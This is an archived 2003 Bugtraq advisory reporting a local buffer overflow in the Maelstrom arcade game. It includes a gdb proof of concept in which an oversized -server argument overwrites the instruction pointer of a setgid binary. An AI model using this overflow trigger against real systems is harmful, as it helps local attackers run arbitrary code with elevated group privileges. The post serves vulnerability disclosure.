Home page logo
/

bugtraq logo Bugtraq mailing list archives

Maelstrom Buffer Overflow
From: Luca Ercoli <luca.ercoli () inwind it>
Date: 18 May 2003 13:52:04 -0000



Maelstrom is an arcade game. There is a buffer overflow vulnerability in 
Maelstrom which allow local attacker 
arbitrary code execution.

Vulnerable systems: Maelstrom 3.0.6
                    Maelstrom 3.0.5

Example:
 
[lucae () linux]$ gdb /usr/bin/Maelstrom 

GNU gdb 5.2.1-2mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...

(gdb) set args -server 2 () `perl -e 'print "ABCD" x 9999'`
(gdb) r

Starting program: /usr/bin/Maelstrom -server 2 () `perl -e 'print "ABCD" x 
9999'`
Couldn't resolve host name for ABCDABC......ABCD

Program received signal SIGSEGV, Segmentation fault.
0x41444342 in ?? ()

(gdb) Quit



Note: -rwxr-sr-x    1 root     games      171568 19 feb 
03:38 /usr/bin/Maelstrom   in Linux Professional 9.0



Luca Ercoli luca.ercoli () inwind it


  By Date           By Thread  

Current thread:
  • Maelstrom Buffer Overflow Luca Ercoli (May 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault